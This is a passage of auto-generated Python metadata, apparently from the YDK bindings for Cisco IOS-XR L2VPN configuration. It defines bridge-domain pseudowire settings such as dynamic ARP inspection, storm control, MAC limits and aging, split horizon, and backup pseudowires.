_MetaInfoClassMember('bridge-domain-evi', REFERENCE_LIST, 'BridgeDomainEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
[], [],
''' Bridge Domain EVI
''',
'bridge_domain_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic ARP Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Access Pseudowire Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai-address-validation', REFERENCE_CLASS, 'PseudowireDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
[], [],
''' Address Validation
''',
'pseudowire_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
False,
[
_MetaInfoClassMember('bdpw-storm-control-type', REFERENCE_LIST, 'BdpwStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
[], [],
''' Storm Control Type
''',
'bdpw_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
False,
[
_MetaInfoClassMember('bd-pw-static-mac-address', REFERENCE_LIST, 'BdPwStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'bd_pw_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic IP source guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Pseudowire MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
False,
[
_MetaInfoClassMember('pseudowire-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' MAC Aging Time
''',
'pseudowire_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pseudowire_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
False,
[
_MetaInfoClassMember('pseudowire-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Bridge Access Pseudowire MAC address
limit enforcement action
''',
'pseudowire_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on a Bridge
Access Pseudowire after which MAC limit
action is taken
''',
'pseudowire_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Bridge Access Pseudowire
''',
'pseudowire_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Bridge-domain Pseudowire MAC
configuration mode
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging', REFERENCE_CLASS, 'PseudowireMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pseudowire_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable MAC Learning
''',
'pseudowire_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit', REFERENCE_CLASS, 'PseudowireMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pseudowire_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'pseudowire_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-secure', REFERENCE_CLASS, 'PseudowireMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
[], [],
''' MAC Secure
''',
'pseudowire_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
False,
[
_MetaInfoClassMember('bd-pw-split-horizon-group', REFERENCE_CLASS, 'BdPwSplitHorizonGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
[], [],
''' Split Horizon Group
''',
'bd_pw_split_horizon_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domain-backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bridge_domain_backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
False,
[
_MetaInfoClassMember('bridge-domain-backup-pseudowire', REFERENCE_LIST, 'BridgeDomainBackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
[], [],
''' Backup pseudowire configuration
''',
'bridge_domain_backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bd_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-mpls-static-labels', REFERENCE_CLASS, 'BdPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'bd_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-split-horizon', REFERENCE_CLASS, 'BdPwSplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
[], [],
''' Split Horizon
''',
'bd_pw_split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-static-mac-addresses', REFERENCE_CLASS, 'BdPwStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'bd_pw_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bdpw-storm-control-types', REFERENCE_CLASS, 'BdpwStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
[], [],
''' Storm Control
''',
'bdpw_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-backup-pseudowires', REFERENCE_CLASS, 'BridgeDomainBackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
[], [],
''' List of pseudowires
''',
'bridge_domain_backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai', REFERENCE_CLASS, 'PseudowireDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
[], [],
''' Access Pseudowire Dynamic ARP Inspection
''',
'pseudowire_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding
''',
'pseudowire_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding Unknown
Unicast
''',
'pseudowire_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
